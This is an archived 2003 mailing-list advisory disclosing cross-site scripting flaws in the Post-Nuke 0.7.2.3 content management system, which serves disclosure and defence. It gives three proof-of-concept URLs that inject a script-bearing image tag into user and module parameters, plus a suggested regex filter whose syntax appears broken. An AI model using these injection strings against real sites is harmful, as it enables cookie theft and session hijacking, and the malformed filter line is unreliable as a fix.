Issue : Cross site scripting in Post-Nuke Version affected : Post Nuke 0.7.2.3-Phoenix Description : Post-Nuke is a content management system that allow you to deploy a website easily . Its developers claim that their product is more secure than competitors . I found three places when a script can be injected to be executed in the context of the webpage , making possible to steal user cookies and hijack their sessions . http://www.server.com/user.php?op=confirmnewuser&module=NS-NewUser&uname=%22 %3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=lucas@pelu cas.com http://www.server.com/modules.php?op=modload&name=FAQ&file=index&myfaq=yes&i d_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent _id=0 http://www.server.com/modules.php?letter=%22%3E%3Cimg%20src=javascript:alert (document.cookie);%3E&op=modload&name=Members_List&file=index Solution : Althoug I am not a php developer , I think filtering of all not alfanumeric characters is needed , not just filtering script tags passed to vars in the url . $good_var=eregi_replace("[^a-z0-9]+)and([^a-z0-9]+)","0",$var); You can find a spanish version of this advisory at http://nautopia.org/vulnerabilidades/postnuke_xss.htm Regards , David F. Madrid , Madrid , Spain
This archive was generated by hypermail 2b30 : Fri Jun 13 2003 - 12:21:55 PDT